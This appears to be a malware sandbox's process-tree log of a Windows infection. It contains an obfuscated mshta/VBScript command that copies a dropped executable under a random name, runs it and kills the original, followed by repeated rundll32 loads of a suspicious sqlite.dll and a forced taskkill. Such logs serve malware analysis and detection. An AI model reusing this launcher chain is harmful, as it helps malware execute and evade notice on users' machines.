C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))1⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
PID:956
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"1⤵PID:348
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe"1⤵PID:5560
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6012 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5672
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:4748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4996
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7708
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7880
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7580
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4189A9E86541436129857B1236B7C904 C2⤵PID:4896
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 35EB6FF1AB3F7E74EF463F4A442847352⤵PID:2360
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8048
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2FC8F7C1A3503A3E2A98642B9A9903C1 E Global\MSI00002⤵PID:1012
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7628 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6236
-
-
C:\Program Files (x86)\Rvpa\zps8ftbcv1pnvvp.exe"C:\Program Files (x86)\Rvpa\zps8ftbcv1pnvvp.exe"1⤵PID:7224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5820
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7308 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7904
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6960
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4268
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4148
-
C:\Users\Admin\AppData\Roaming\vhdbcvrC:\Users\Admin\AppData\Roaming\vhdbcvr1⤵PID:6928
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1940
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2352
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5752
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5324
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7304
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5740
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7788
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2220
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6380